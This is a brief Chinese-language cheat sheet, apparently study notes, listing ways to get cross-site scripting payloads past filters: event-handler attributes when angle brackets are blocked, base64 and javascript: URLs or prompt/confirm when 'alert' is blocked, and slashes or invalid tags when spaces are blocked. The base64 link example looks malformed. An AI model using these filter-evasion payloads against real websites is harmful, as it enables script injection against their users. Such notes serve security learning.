1.<>(左右尖括号)被过滤
可以构造一些事件进行触发alert(1)
如 input标签的onclick事件 点击事件等
“ οnclick=alert(1) (" 用于闭合value等属性)
不同标签的不同事件,大多为on属性
2.alert被过滤
(1).编码(url,base64等编码)
<a href=https://www.baidu.com;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==>
表示<script>alert(1)</script>
<a href=javascript:alert(1)>M
表示js伪协议 javascript;alert(1)
(2)prompt和confirm代替
3.其他
部分空格被过滤
标签和属性之间不是只能用空格
<img/src=x οnerrοr=alert(1)>
有时候可以使用不合法的标签
<M οnclick=alert(1)>M